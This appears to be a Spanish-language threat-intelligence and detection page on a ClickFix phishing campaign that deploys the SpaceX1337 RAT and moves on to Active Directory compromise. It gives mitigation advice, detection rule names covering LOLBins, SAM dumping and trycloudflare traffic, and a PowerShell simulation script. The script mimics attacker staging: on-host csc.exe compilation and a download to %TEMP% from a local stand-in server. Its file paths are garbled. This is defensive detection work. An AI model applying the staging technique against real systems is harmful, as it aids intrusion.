SpaceX1337 ClickFix conduce a un compromiso de AD manual
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un adversario utilizó un señuelo de phishing ClickFix para desplegar el RAT SpaceX1337, seguido de una infección en múltiples etapas que involucra RATs estándar como NetSupport, AsyncRAT y Remus. La intrusión progresó desde el robo automatizado de credenciales hacia una actividad interactiva con manos en el teclado dirigida al Active Directory. El atacante finalmente intentó el movimiento lateral hacia un controlador de dominio y el relleno de credenciales contra un portal VPN.
Investigación
La intrusión fue capturada dentro de una honeynet de Active Directory completamente instrumentada, proporcionando visibilidad de extremo a extremo a través de telemetría de EDR, Zeek y Suricata. Los investigadores rastrearon la actividad desde el descargador inicial de PowerShell a través de un amplio reconocimiento ADSI/LDAP y movimiento lateral sobre SMB. La investigación identificó claramente la transición de la ejecución automática de malware a la interacción directa por un operador humano.
Mitigación
Las organizaciones deben aplicar controles estrictos de ejecución de PowerShell y monitorear las relaciones de proceso padre-hijo sospechosas, incluyendo explorer.exe generando PowerShell. Los equipos de seguridad deben detectar la compilación en el host a través de csc.exe y el abuso de LOLBins como certutil or bitsadmin para descargas externas. El Active Directory también debe ser reforzado eliminando datos sensibles de los atributos LDAP y monitoreando consultas LDAP anómalas.
Respuesta
Si se detecta actividad sospechosa, los respondedores de incidentes deben aislar los puntos finales afectados y revocar las credenciales potencialmente comprometidas de cuentas de servicio y administradores de dominio. Las investigaciones deben priorizar la identificación de múltiples familias de RAT y verificar tareas programadas no autorizadas o modificaciones en el registro. Los registros de VPN también deben revisarse en busca de intentos de relleno de credenciales provenientes de infraestructura maliciosa conocida.
Flujo de Ataque
Detecciones
Ejecución de Python desde carpetas sospechosas (a través de cmdline)
Entrada Suspicious RunMRU Con Semántica LOLBin (a través de registry_event)
Ejecución de comandos en un host remoto usando la Gestión Remota de Windows (a través de cmdline)
Posible Enumeración/Manipulación de Cuentas o Grupos (a través de cmdline)
Descubrimiento Sospchoso de Confianzas de Dominio (a través de cmdline)
Posible Descubrimiento de Configuración de Red del Sistema (a través de cmdline)
Ejecutable Sospechoso Conteniendo Solo Números En el Nombre (a través de cmdline)
LOLBAS Schtasks (a través de cmdline)
Uso de Certutil para Codificación de Datos y Operaciones de Certificado (a través de cmdline)
LOLBAS Bitsadmin (a través de cmdline)
Posible Vaciamiento de SAM/SYSTEM/SECURITY (a través de cmdline)
Llamada a Métodos Sospechosos .NET desde Powershell (a través de powershell)
Comunicación de Dominio Sospechosa Trycloudflare (a través de dns)
Intento de Comunicaciones con Dominio para Búsqueda de IP (a través de dns)
IOCs (HashSha256) para detectar: Desde ClickFix SpaceX1337 hasta el Ataque AD con Manos en el Teclado
IOCs (HashMd5) para detectar: Desde ClickFix SpaceX1337 hasta el Ataque AD con Manos en el Teclado
IOCs (SourceIP) para detectar: Desde ClickFix SpaceX1337 hasta el Ataque AD con Manos en el Teclado
IOCs (DestinationIP) para detectar: Desde ClickFix SpaceX1337 hasta el Ataque AD con Manos en el Teclado
Regla Sigma de Alta Fidelidad para la Comunicación SpaceX1337 y AdaptixC2 [Conexión de Red de Windows]
Detección de Compilación de Beacon AdaptixC2 y Cargador de PowerShell [Creación de Proceso de Windows]
Ejecución de Simulación
Requisito previo: La Comprobación de Telemetría y Línea Base Pre-vuelo debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.
-
Narrativa del Ataque y Comandos: Un adversario ha ganado acceso inicial a través de un enlace de phishing. Para evitar llevar un
.exemalicioso conocido al disco, dejan caer un pequeño.csarchivo fuente. Luego invocancsc.exepara compilar este fuente en un ejecutable funcional de Windows (svc.exe) ubicado en el%TEMP%directorio. Inmediatamente después de la compilación, el atacante usa PowerShell para obtener un cargador de segunda etapa desde un servidor C2 remoto (simulado a través de un oyente local) usando eliwr(Invoke-WebRequest) alias, guardándolo en la carpeta temporal para completar el proceso de puesta en escena. -
Script de Prueba de Regresión:
# 1. Crear un archivo fuente C# falso para simular la fuente AdaptixC2 $csFile = "$env:TEMPsvc.cs" $exeFile = "$env:TEMPsvc.exe" $sourceCode = @" using System; namespace MimicC2 { class Program { static void Main() { Console.WriteLine("Simulated Beacon"); } } } "@ $sourceCode | Out-File -FilePath $csFile -Encoding ascii # 2. Simular la compilación csc.exe (Activa selection_csc) # Nota: Utilizamos las banderas exactas especificadas en la lógica de detección Start-Process "csc.exe" -ArgumentList "/target:winexe", "/out:$env:TEMPsvc.exe", "$env:TEMPsvc.cs" -Wait # 3. Simular la descarga de PowerShell (Activa selection_powershell) # Usamos 'iwr' y la ruta específica de OutFile para coincidir con la lógica # Usando una URL inexistente para evitar tráfico de red real, pero la línea de comandos coincidirá powershell.exe -Command "iwr -Uri 'http://127.0.0.1' -OutFile `"$env:TEMPx.ps1`"" -
Comandos de Limpieza:
Remove-Item -Path "$env:TEMPsvc.cs" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPsvc.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPx.ps1" -Force -ErrorAction SilentlyContinue